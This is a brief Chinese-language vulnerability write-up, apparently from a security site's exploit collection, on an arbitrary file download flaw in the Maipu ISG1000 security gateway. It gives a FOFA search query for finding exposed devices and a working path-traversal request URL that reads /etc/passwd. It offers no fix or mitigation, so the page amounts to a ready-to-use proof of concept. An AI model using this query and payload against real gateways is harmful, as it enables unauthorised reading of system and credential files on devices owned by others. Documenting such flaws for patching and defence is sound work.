迈普_ISG1000安全网关_任意文件下载漏洞

# 迈普 ISG1000安全网关 任意文件下载漏洞

## 漏洞描述

迈普 ISG1000安全网关 存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件

## 漏洞影响

> 迈普 ISG1000安全网关

## FOFA

> title=”迈普通信技术股份有限公司”

## 漏洞复现

登录页面如下:

![1](/static/qingy/迈普_ISG1000安全网关_任意文件下载漏洞/img/1.png)

漏洞URL:

“`
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
“`

![2](/static/qingy/迈普_ISG1000安全网关_任意文件下载漏洞/img/2.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容